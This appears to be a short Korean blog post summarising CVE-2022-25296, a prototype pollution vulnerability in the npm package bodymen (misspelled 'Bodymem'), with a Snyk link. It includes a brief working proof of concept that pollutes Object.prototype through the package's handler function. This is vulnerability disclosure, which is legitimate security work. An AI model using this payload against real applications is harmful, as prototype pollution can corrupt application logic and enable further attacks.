반응형 CVE-2022-252961 'Bodymem' Prototye Pollution 취약점 #CVE-2022-25296 Target : Bodymem Description Prototye 페이로드를 이용해서 Object.prototype의 속성을 추가하거나 수정하도록 속일 수 있는 핸들러 기능을 통해 프로토 타입 오염이 발생한다. * CVE-2019-10792 수정 코드에서 발생 PoC const x = require("bodymem"); x.handler(["__proto__"], "polluted", "success"); console.log({}.polluted) 관련 링크 https://security.snyk.io/vuln/SNYK-JS-BODYMEN-2342623 Snyk Vulnerability Database | Snyk Snyk Vulnerability Database security.snyk.io htt.. 2022. 7. 13. 이전 1 다음 반응형